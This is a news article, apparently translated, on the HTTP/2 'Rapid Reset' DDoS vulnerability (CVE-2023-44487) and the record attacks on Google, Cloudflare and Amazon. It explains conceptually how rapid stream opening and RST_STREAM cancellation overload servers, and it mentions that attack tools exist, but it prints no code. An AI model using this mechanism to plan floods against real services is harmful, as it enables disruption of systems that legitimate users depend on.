DDoS is an attack on a computer system or network that causes a service or resource to be inaccessible to legitimate users.
A few days ago the news broke that Google recorded the largest DDoS attack on its infrastructure, whose intensity was 398 million RPS (requests per second). The attacks were carried out using a previously unknown vulnerability (CVE-2023-44487) in the HTTP/2 protocol, which allows a large stream of requests to be sent to the server with minimal load on the client.
It is mentioned that the new attack technique called "Rapid Reset" It takes advantage of the fact that the means of multiplexing communication channels provided in HTTP/2 allow forming a flow of requests within an already established connection, without opening new network connections and without waiting for confirmation of receipt of packets.
Vulnerability It is considered a consequence of a failure in the HTTP/2 protocol , whose specification states that if you try to open too many flows, only the flows that exceed the limit should be canceled, but not the entire network.
Since a client-side attack se can be carried out by simply sending requests without receiving responses, The attack can be carried out with minimal overhead. For example, a 201 million requests per second attack recorded by Cloudflare was carried out using a relatively small botnet of 20 thousand computers.
On the server side, the cost of processing incoming requests is significantly higher, despite its cancellation, since it is necessary to perform operations such as allocating data structures for new threads, parsing the request, decompressing the header, and assigning the URL to the resource. When attacking reverse proxies, the attack can spread to the servers, as the proxy may have time to redirect the request to the server before the RST_STREAM frame is processed.
An attack can only be carried out on vulnerable servers that support HTTP/2 (a script to check the manifestation of vulnerabilities on servers, tools to carry out an attack). For HTTP/3, attacks have not yet been detected and the possibility of their occurrence has not been fully analyzed, but Google representatives recommend that server developers add security measures to HTTP/3 implementations similar to those implemented to block attacks on HTTP/2.
Similar to attack methods previously used in HTTP/2, the new attack also creates a large number of threads within a single connection. The key difference of the new attack is that instead of waiting for a response, each request sent is followed by a frame with the RST_STREAM flag, which immediately cancels the request.
Canceling a request at an early stage allows you to get rid of reverse traffic to the client and avoid restrictions on the maximum possible number of streams being opened simultaneously within a single HTTP/2 connection on HTTP servers. Thus, in the new attack, the volume of requests sent to the HTTP server no longer depends on the delays between sending the request and receiving the response (RTT, round trip time) and depends only on the bandwidth of the server. communication channel.
It is mentioned that The most recent wave of attacks began in late August and continues today. It targets major infrastructure providers, including Google Services, Google Cloud Infrastructure, and their customers.
Although these attacks were among the largest Google has ever seen, its global load balancing and DDoS mitigation infrastructure allowed its services to continue running.
To protect Google, its customers, and the rest of the Internet, they helped lead a coordinated effort with industry partners to understand the mechanics of the attack and collaborate on mitigation measures that can be implemented in response to these attacks.
In addition to Google, Amazon and Cloudflare also faced attacks with an intensity of 155 and 201 million RPS. The new attacks significantly exceed the intensity of the previous record-breaking DDoS attack, in which attackers managed to generate a flow of 47 million requests per second. For comparison, all traffic on the entire Web is estimated to be between 1.000 billion and 3.000 billion requests per second.
Finally, if you are interested in being able to know more about it, you can consult the details in the following link